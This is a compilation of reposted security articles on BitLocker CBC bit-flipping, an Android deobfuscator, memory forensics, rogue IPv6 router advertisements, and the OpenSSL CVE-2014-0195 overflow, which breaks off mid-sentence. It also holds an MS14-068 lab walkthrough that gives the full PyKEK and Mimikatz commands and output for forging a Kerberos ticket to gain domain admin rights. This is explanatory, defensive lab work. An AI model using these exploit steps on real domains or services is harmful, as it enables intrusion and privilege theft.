the goal of Elephant is to provide as much diffusion as possible, while still being highly performant. The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote: Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack. The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it. BitLocker in Windows 8 & 8.1 BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default. It’s actually not even a choice, the option is entirely gone from the Group Policy Editor. (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.” However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1. AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”. They explicitly said “it should be relatively easy to mount an attack”. And it is. As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext. Flipping a single bit in the ciphertext results reliably scrambles the next plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line): This type of fine-grained control is exactly what Poor Man’s Authentication is designed to combat. We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext and we want it to affect an extremely large swath of data. This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips. But what bits do we flip? If the disk is encrypted, don’t we lack any idea of where anything interesting is stored? Yes and no. In our testing, two installations of Windows 8 onto the same format of machine put the system DLLs in identical locations. This behavior is far from guarenteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext. And at that point, we can do more than just flip bits, we can completely rewrite what will be decrypted upon startup. This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code. So we did. Below is a short video that shows booting up a Virtual Machine showing a normal unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution. This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to write out desired shellcode, and wrote it onto the disk. (The particular file we chose did move around during installation, so we did ‘cheat’ a little - with more time investment, we could change our target to a system dll that hasn’t been patched in Windows Updates or moved since installation.) Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over. To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against LUKS partitions last year. XTS Mode The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption and standardized and blessed by NIST? XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks. But it’s not perfect. Let’s look at what happens when we flip a single bit in ciphertext encrypted using XTS: A single bit change completely scrambles the full 16 byte block of the ciphertext, there’s no control over the change. That’s good, right? It’s not bad, but it’s not as good as it could be. Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don’t have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property: LRW provides some level of poor-man’s authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like “enableSomeSecuritySetting=1”. If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2?16 chance that the first two bytes of the plaintext will be 0x30 0x00 which is a string that encodes the ASCII value ’0’. For BitLocker we want a block cipher whose block size is much larger. Furthermore, they elaborate upon this in their comments to NIST on XTS, explicitly calling out the small amount of diffusion. A 16-byte scramble is pretty small. It’s only 3-4 assembly instructions. To compare how XTS’ diffusion compares to Elephant’s, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros. The resulting output shows that 512 bytes (the smallest sector size in use) were modified: This amount of diffusion is obviously much larger than 16 bytes. It’s also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass. Remember, this is all ‘Poor Man’s Authentication’ - we know the solution is not particularly strong, we’re just trying to get the best we can. But it’s still a lot harder to pop calc with. Conclusion From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte. Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser. And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the ‘exception’ but a major target market. Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone’s who had a laptop stolen from a rental car knows. Ultimately, I’m extremely curious what requirements the new BitLocker design had placed on it. Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks. With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS. I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC. Sursa: https://cryptoservices.github.io/fde/2014/12/08/code-execution-in-spite-of-bitlocker.html
-
Simplify Generic Android Deobfuscator Simplify uses a virtual machine to understand what an app does. Then, it applies optimizations to create code that behaves identically, but is easier for a human to understand. Specifically, it takes Smali files as input and outputs a Dex file with (hopefully) identical semantics but less complicated structure. For example, if an app's strings are encrypted, Simplify will interpret the app in its own virtual machine to determine semantics. Then, it uses the apps own code to decrypt the strings and replaces the encrypted strings and the decryption method calls with the decrypted versions. It's a generic deobfuscator becuase Simplify doesn't need to know how the decryption works ahead of time. This technique also works well for eliminating different types of white noise, such as no-ops and useless arithmetic. Before / After There are three parts to the project: Smali Virtual Machine (SmaliVM) - A VM designed to handle ambiguous values and multiple possible execution paths. For example, if there is an if, and the predicate includes unknown values (user input, current time, read from a file, etc.), the VM will assume either one could happen, and takes the true and false paths. This increases uncertainty, but maintains fidelity. SmaliVM's output is a graph that represents what the app could do. It contains every possible execution path and the register and class member values at each possible execution of every instruction. Simplify - The optimizer. It takes the graphs from SmaliVM and applies optimizations like constant propagation, dead code removal, and specific peephole optimizations. Demoapp - A short and heavily commented project that shows how to get started using SmaliVM. Building There is a bug with dexlib 2.0.3 which can cause Simplify to fail often. To work around, you must: Clone and build Smali Modify this line in smalivm/build.gradle to point to the built jar, if different: compile files('../../smali/dexlib2/build/libs/dexlib2-2.0.3-dev.jar') Sorry for this step. It won't be necessary once updated dexlib is released. To build the jar, use ./gradlew shadowJar Sursa: https://github.com/CalebFenton/simplify
-
Analyzing Malicious Processes Posted on 2013/11/11 by jackcr Today I tweeted “Analysis techniques are individually developed. Show people processes and let them be creative”. SO I wanted to write this post to describe a method I use to analyze processes on hosts that are suspected of being compromised. When attackers gain access to your network they will need to perform certain activities in order to accomplish their goals. Very often these activities will result in executables being ran and processes started as a result. Identifying these processes is very important, but what do you do after is where you begin to earn your money. For this post I will be using a memory image from the jackcr-challenge which I created last year. If you are interested in tackling this challenge it can be downloaded from the link on the right side bar or you can follow this link https://docs.google.com/file/d/0B_xsNYzneAhEN2I5ZXpTdW9VMGM/edit. When looking at processes pay attention to the start times. We should be focusing on ones that have started around the same time frame that we are investigating (if the machine has been rebooted after the initial compromise then this method will obviously not work). Remember that attackers will very often leverage windows tools so don’t discount processes that seem like they would be non-malicious just because it was executed from a legitimate Microsoft executable. It’s also a good idea to pay attention to spawned processes as well a parent processes. If cmd.exe was spawned from iexplore.exe it may be cause for some concern. Looking at our memory image we start by inspecting the process listing. The above command will display the following output. At first glance the cmd.exe process may seem a little suspicious but is was spawned from explorer.exe and is responsible for mdd.exe which collected the memory dump. The PSEXECSVC.exe process looks a little suspicious though. When psexec.exe is executed on a client machine it will copy the psexecsvc.exe binary over a smb connection to the destination and start a service as well as create a named pipe in which commands will be executed over. This may very well be an admin performing maintenance on the server, but not knowing for sure warrants investigation. The first thing I will want to look at are the ip’s that have been communicating to this machine on ports 135 and 445 since I know psexec communicates over these. As these connections may not be established any longer I will use the Volatility plugin, connscan, which has the ability to locate closed tcp connections as it scans for _TCPT_OBJECTS which may still reside in memory. Based on the output we have 3 machines that we may need to validate and possibly investigate after performing analysis on this machine. We will also use these ip’s when analyzing the process strings. Before looking at the strings I want to look at the open handles to the process as it may give some clues to additional items that may need to be investigated. At this point I mainly want to look at open file handles. The above command will produce the following output. We can see the named pipe created by the execution of psexec on the client machine, but not really anything else that would steer my investigation. The output can be large so I initially like to start with a smaller subset that I think may give some results I’m looking for. At this point I will broaden my search to see if I can find anything else of interest. We can see in the below output that we have a hostname that’s tied to this process. If this turns out to be a malicious process we will need to immediately contain that host to prevent further lateral movement and investigate for additional compromises. As processes start, the operating system will allocate up to 2GB of virtual address space for that process to execute in. I like to think of processes as a container of activity. If I specifically look at that container I should see activity that is directly related to the activity I’m looking for. This is important because when looking at memory strings it’s very easy to to find things that look really bad only to find out that they are part of an AV signature or part of a legitimate connection. It is also much easier to analyze a small section of memory than the entire memory dump. Using the volatility plugin memdump we can dump the entire contents of a process into a binary file. We should create a strings file with both ascii and unicode strings as it’s much faster to grep through ans ascii file than a binary file. By default I like to prepend each string with the byte offset incase I need to locate that string in the dump file. We can use the following 2 commands to produce this file. Very often when attackers want to execute commands on compromised machines they will create batch scripts to perform these tasks. Just searching the strings file for “echo off” we are able to, not only confirm that this host is compromised, but gain insight into what happened on this machine as well as identify indicators to look for on our network. The 3 batch scripts identified performed the following actions: 1. Rar’d up the contents of C:\Engineering\Designs\Pumps 2. Created a scheduled task to copy wc.exe to the system32 directory and execute it at 04:30 3. Collected system information and directed the output to the file system.dll Searching the process data for the ip’s I was able to locate these log files in memory indicating a login to this machine using the sysbackup account which was the same username identified in the batch script. The host that initiated the login was also the host identified in the handles output. Knowing that this machine is confirmed compromised there are some additional actions we must take in hopes of limiting the scope of the incident. 1. Search network for any directories named webui in the system32 directory 2. Attempt to locate wc.exe in memory or on the host itself to determine capabilities (typicaly locating in memory would be much faster then collecting on the host). 3. Collect and analyze data from 3 ip’s seen making port 445 connections 4. Search network for presence of wc.exe, ra.exe, system.dll 5. Search logs for 540 / 4624 type 3 logon attempts from suspicious ip’s as well as machines using the sysbackup account. 6. Change the sysbackup credentials as well as all user credentials on the compromised machines (domain and local) 7. Determine what files were rar’d 8. Look for possible data exfil in network traffic There is a lot of additional data in these memory images and I encourage you to have a look at them if you’ve not already done so. Again I hope this helps somebody out there and let me know if you have any questions or comments. Sursa: Analyzing Malicious Processes
-
Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) by Sean Metcalf MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monné posted to GitHub a few days ago. I configured a Windows 7 workstation with Python 2.7.8 and downloaded the PyKEK zip as well as the Mimikatz zip file. The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller. I ran PyKEK against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation. Interesting side note: I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068. After successfully running the PyKEK script to generate the TGT, I was unable to get a TGS successfully to exploit the 2008 R2 DC. After shutting down the 2012 & 2012R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02). I will be looking into this more later this week. 12/8 Update: I added a Mitigation section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section). Staging the Attack: The targeted user account in this post is “Darth Sidious” (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC). Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer. Once the attacker has valid domain credentials and local admin rights on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC. The PyKEK ms14-068.py Python script needs some information to successfully generate a forged TGT: User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org User Password [-p]: TheEmperor99! User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-222232912 7-1110 Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org The SID can be found by running the “whoami” command while logged in as the target user. You can also get this information from PowerShell by running : [security.Principal.WindowsIdentity]::GetCurrent( ) As I noted in my previous post on PyKEK, the following group membership is included in the forged TGT: Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) Phase 1: Forging a TGT: Here’s a screenshot of the exploit working in Kali Linux (1.09a) After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz. It works well on Windows running Python as well (command is in bold & italics). c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912 7-1110 -d adsdc02.lab.adsecurity.org [+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done! Here’s the screenshot of the ms14-068 exploit working on Windows. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: ADSecurityOrg-MS14068-Exploit-KRBPackets Note that I have generated a forged TGT with a single, stolen domain account. The next step is to use this forged TGT, so I logon to a computer as the local admin account with network access to the targeted Domain Controller. Whoami shows I am logged on as admin on the computer ADSWKWIN7. Klist shows there are no Kerberos tickets in memory for this user (there wouldn’t be, this is a local admin account). The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\temp\pykek shown above) Phase 2: Injecting the forged TGT and gaining a valid TGS: After the forged Kerberos TGT ticket is generated, it’s time to inject it into the current user session using Mimikatz (command is in bold & italics). c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit .#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ‘## v ##’ mimikatz | Blog de Gentil Kiwi (oe.eo) ‘#####’ with 15 modules * * */ mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG Data 0 Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 – rc4_hmac_nt af5e7b47316c4cebae0a7ead04059799 Ticket : 0x00000000 – null ; kvno = 2 […] * Injecting ticket : OK mimikatz(commandline) # exit Bye! Note that since I am injecting the forged TGT which states that I am a member of Domain Admins, Enterprise Admins, etc into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic using the forged TGT ticket via Mimikatz and connecting to the Domain Controller’s Admin$ share: ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the local admin – not with AD domain credentials), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit). Domain Controller Event Logs from the Attack: Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller’s admin$ share and locate the AD database files: Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4624 shows darthsidious@lab.adsecurity.org using the TGS service ticket to logon to the target Domain Controller. Event 5140 shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller’s Admin$ share (net use \\adsdc02.lab.adsecurity.org\admin$) which only an administrator has access. Event 4672 shows darthsidious@lab.adsecurity.org successfully authenticated (and logged on to) the target Domain Controller which only an administrator has access. Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc showing the user has full Admin access to this computer. It’s Game Over at this point. Here’s what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC: Event 4769 shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS fails because the DC (adsdc01.lab.adsecurity.org) is patched an logs this failure in the security event log as a failed 4769 event. . NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch). Event 4776 shows an audit failure for the computer and the username logged into the computer. This event is associated with the 4769 event above. Since I was logged on as the local administrator account “admin” it shows in the log. This is a red flag. However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain and it may not be scrutinized as much. Check your logs! Note: There should only be minor differences in performing any of these actions from a non-domain joined computer. This concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account). Mitigations: Patch all Domain Controllers with KB3011780 in every AD domain. I uploaded a sample script for getting KB3011780 patch status for all Domain Controllers: Get-DCPatchStatus (change file extension to .ps1) [UnPatched DCs] Monitor event ID 4672 for users who are not members of domain-level admin groups (default groups able to logon to Domain Controllers – this is why you shouldn’t use these default, built-in groups for delegation of administration): Enterprise Admins (admin on all DCs in the forest), Domain Admins Administrators Server Admins Backup Operators Account Operators Print Operators Other groups delegated in your environment to logon to Domain Controllers [Patched DCs], monitor event id 4769 Kerberos Service Ticket Operation event which shows failed attempts to get Kerberos service tickets (TGS). References: MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK) Mimikatz and Active Directory Kerberos Attacks MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum Kerberos Vulnerability in MS14-068 Explained MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege The Python script MS14-068 POC code: Python Kerberos Exploitation Kit (PyKEK) Benjamin Delpy’s blog (Google Translate English translated version) Mimikatz GitHub repository Mimikatz Github wiki Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014) All Mimikatz Presentation resources on blog.gentilkiwi.com Sursa: Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)
-
Why You Must Use ICMPv6 Router Advertisements (RAs) Posted on June 16, 2014 - 05:14:52 PM by Scott Hogg When a dual-protocol host joins a network it sends an ICMPv6 (type 133) Router Solicitation (RS) message to inquire about the local IPv6-capable router on the network. The local router is tuned into the ff02::2 (all-router’s multicast group address) and will receive the RS message. In response to the RS, the router immediately sends an ICMPv6 (type 134) Routing Advertisement (RA) message to the all nodes on the network (ff02::1, the all nodes multicast group address). The router also sends the RA messages periodically (typically every 200 seconds) to keep the nodes informed of any changes to the addressing information for the LAN. The RA message contains important information for nodes as well as which method they should use to obtain their IPv6 address. The RA contains several flags that are set that the nodes watch for and use. A-bit – Autonomous Address Autoconfiguration Flag tells the node it should perform stateless address assignment (SLAAC RFC 4862) L-bit – On-Link Flag tells the node that the prefix listed in the RA is the local IPv6 address M-bit – Managed Address Config Flag tells the host if it should use stateful DHCPv6 (RFC 3315) to acquire its address and other DHCPv6 options O-bit – Other Config Flag tells the host that there is other information the router can provide (such as DNS information defined in Stateless DHCPv6 (RFC 3736)) ICMPv6 RAs are intended to help facilitate bootstrapping the connectivity of an IPv6 node on a network. They tell the hosts on the LAN how they should go about acquiring their global unicast IPv6 address and become productive members of the network. The RA also provides the end-node information about the local router and its ability to be the default gateway. This process is well documented in Section 4 of the IETF RFC 4861 “Neighbor Discovery for IP version 6 (IPv6)”. Unfortunately, there are some security risks related to ICMPv6 RA messages. On networks that do not yet use IPv6, the dual-stack hosts sit dormant waiting for an eventual RA message to awaken their IPv6 connectivity. An attacker can craft a “rogue RA” message on these networks, get the dual-protocol nodes on the network to configure their IPv6 addresses and utilize the attacker’s system as their default gateway. The attacker can then easily perform a Man-In-The-Middle (MITM) attack without the user’s knowledge using this technique. This issue is documented in RFC 6104 “Rogue IPv6 Router Advertisement Problem Statement”. On networks that already have IPv6 running, rogue RAs can destabilize the network (and still perform a MITM attack). Rogue RA messages can be easily generated with The Hacker’s Choice IPv6 Attack Toolkit, Scapy, SI6 Networks IPv6 Toolkit, Nmap, and Evil FOCA, among other tools and methods. There are methods to detect and block these rogue RA messages. Utilities like NDPMon, Ramond, 6MoN, and others can be used to look for suspicious Neighbor Discovery Protocol (NDP) packets and detect invalid RA messages. These tools function much like the old ARPWATCH program did for detecting ARP attacks on an IPv4 LAN. There is a technique called “RA Guard” that can be implemented in an Ethernet switch to permit legitimate RAs from a valid router and block the malicious rogue RA messages. This technique is documented in IETF RFC 6105 “IPv6 Router Advertisement Guard”. There is also a very new RFC 7113 “Implementation Advice for IPv6 Router Advertisement Guard (RA-Guard)”. A good example of improved first hop security (FHS) in IPv6 can be implemented in Cisco switches. Unfortunately, there are also methods to avoid any rogue RA detection accomplished by NDP security methods. Finding the ICMPv6 layer-4 header information could be made difficult by forcing the system to fully parse the IPv6 header structure. An attacker can change the location of the RA in the IPv6 packet by using extension headers to avoid detection especially if security tools do not parse the entire RA message. If an end-node receives an RA with a hop-by-hop extension header or an atomic fragment, the host disregards the header but still processes the RA normally. This rogue RA attack is called “RA guard evasion”. Legitimate RA messages should not include fragmentation or other headers. There is some additional guidance along these lines documented in RFC 6980 “Security Implications of IPv6 Fragmentation with IPv6 Neighbor Discovery”. There are other beneficial uses of ICMPv6 RA messages on a LAN. Another method of getting DNS information to IPv6 nodes is to leverage options within the RA to send the DNS server and domain search list. Nodes that receive the RA can simply parse these options and get this DNS information and use it with their SLAAC auto-generated IPv6 addresses. IETF RFC 6106 "IPv6 Router Advertisement Options for DNS Configuration" defines the Recursive DNS Server (RDNSS) and DNS Search List (DNSSL) options within Router Advertisement (RA). One of the challenges with RDNSS is getting support for it natively in the host operating systems. This link provides some information on which OSs support this option. There is also a RDNSS deamon for Linux (rdnssd). Even if you intend to use DHCPv6 instead of SLAAC in your environment, you still need RA messages to function on the local LAN. The RAs provide the default gateway information to an end node and, with the M-bit, inform the nodes that the LAN uses stateful DHCPv6. DHCPv6 does not currently have an option to provide this information to the DHCPv6 client in the same way it is provided with DHCP for IPv4. Providing the default gateway as a DHCPv6 option was proposed, but never made it into the standards. DHCPv6 may be desirable in the desktop access portions of an enterprise network and DHCPv6 is absolutely essential in the service provider’s subscriber access networks. However, organizations may not need DHCPv6 in a data center environment. Most organizations will prefer to statically configure IPv6 address parameters on specific systems in the network environment. Static address configuration may be preferred for systems that need to have a fixed, non-changing IPv6 address or for nodes that are unable to perform dynamic address assignment. The systems in the networks that will most likely use this static IPv6 addressing technique are servers and systems within data center environments. These servers could be on an internally-accessible networks, private/hybrid cloud infrastructures, or Internet publically-accessible network. Any system that is going to have its address used in some form of firewall policy or access-control list will need a static address. Servers within a data center environment would need to be configured with the following information to be able to operate correctly in an IPv6 environment Static IPv6 address for its network interface This address would be allocated from the IPAM system and registered within the DNS system with an AAAA resource record and an accompanying PTR record. Static IPv6 default gateway This could either be a global unicast address of the first-hop router or the Link-Local address of the first-hop router (e.g. FE80::1). Static DNS server This is the caching DNS resolver this system will use when it needs to perform DNS queries (e.g. configured within the /etc/resolv.conf) DNS Domain Name This is the domain name that the system will use in combination with the server's hostname to create its fully-qualified domain name (FQDN) (e.g. the domain suffix search order list) Typically, servers will have a static IPv6 address assigned, But they will still use the information contained in the ICMPv6 (type 134) Router Advertisement (RA) message sent by the first-hop router to learn information about the default gateway. RA messages contain the link-local address and the layer-2 (MAC) address of the first-hop router. Servers can listen to these and use this information to auto-configure their default gateway. If you want to disable sending of RA messages on a Cisco IOS router, you can use the following commands to accomplish this goal. interface GigabitEthernet 0/12 ipv6 address 2001: db8:1234:5678::1/64 ipv6 nd prefix no-autoconfig ipv6 nd suppress-ra ipv6 nd ra suppress all It is important to realize how important the ICMPv6 RA message is to the function of an IPv6-enabled LAN. Security risks exist, but the attacker must be on-net or have compromised a node on the network to be able to perform these rogue RA MITM attacks. Most enterprise organizations would prefer DHCPv6 for desktop LANs, but RAs are still needed on these networks. In a data center, an organization may want to statically assign the address details to hosts and not use RA messages. Regardless, people should not fear the RAs and learn to embrace them. Sursa: https://community.infoblox.com/blogs/2014/06/16/why-you-must-use-icmpv6-router-advertisements-ras
-
CVE-2014-0195: Adventures in OpenSSL’s DTLS Fragmented Land By Mark Yason December 8, 2014 Earlier this year, details of a remote code execution bug in OpenSSL’s DTLS implementation were published. The following is a look at the bug, its process and the different ways attackers might leverage it for exploitation: Vulnerability On a high level, the bug allows writing past the end of a buffer allocated in the heap, allowing application data or heap metadata to be overwritten. This leads to application crashes or remote code executions, at worst. The bug is due to the way the OpenSSL DTLS parser handles fragmented handshakes. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message. Consider the following fragmented ClientHello message that triggers the bug: When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data “A” (fragment offset = 0, fragment length = 1) is written to the message buffer: Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length is checked to determine whether they are within the range of the message length: Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data “B” (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer: As you may have observed, the bug is interesting in that an attacker has a relatively high control of where (fragment offset), what (fragment data) and how much data (fragment length) can be written. Triggering Now that we have an idea of what the bug is, let’s try to trigger it. For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory. Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1“; this causes the OpenSSL tool to listen on Port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught: The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()). DTLS Exploitation After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This will serve as a great learning experience because it will teach us how attackers think, what their process is and what other weakness they might use to fully leverage the bug. For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS. Once a target service is running, the next step involves attaching to the process, setting breakpoints to the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. Understanding the allocations that occur after the message buffer allocation allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk), and therefore, targeted for overwrite. After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug to a fairly limited “write arbitrary data to the address pointed to by pointers found in the process” exploit primitive: In the context of DTLS, pitem is a linked list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure: The hm_fragment structure contains information about the fragmented handshake message state, and more importantly, the message buffer pointer (hm_fragment.fragment). Every time a handshake fragment parsed, the related pitem of the handshake is retrieved, pitem.data is casted to a hm_fragment* and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment: Therefore, using the bug to point pitem.data somewhere in the process address space so that pitem.(hm_fragment*)data->fragment is aligned to a pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points to. To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset 